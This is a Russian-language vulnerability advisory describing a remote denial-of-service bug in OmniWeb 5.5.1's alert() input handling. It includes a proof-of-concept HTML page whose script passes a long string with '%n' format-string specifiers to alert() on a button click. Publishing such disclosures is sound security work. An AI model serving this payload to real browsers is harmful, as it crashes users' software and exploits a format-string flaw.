Программа: OmniWeb 5.5.1

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных в функции alert(). Атакующий может передать уязвимой функции злонамеренные данные, что приведет систему к отказу в обслуживании.

Пример:

<html>
<head>
<title>MOAB-07-01-2007</title>
<script>
/* LMH */
function boom() {
var str = 'A';
while (str.length <= 32) str+=str;
str = str + '%n%n%n%n%n%n';
alert(str);
}
</script>
</head>
<body>
<input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
</body>

</html>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии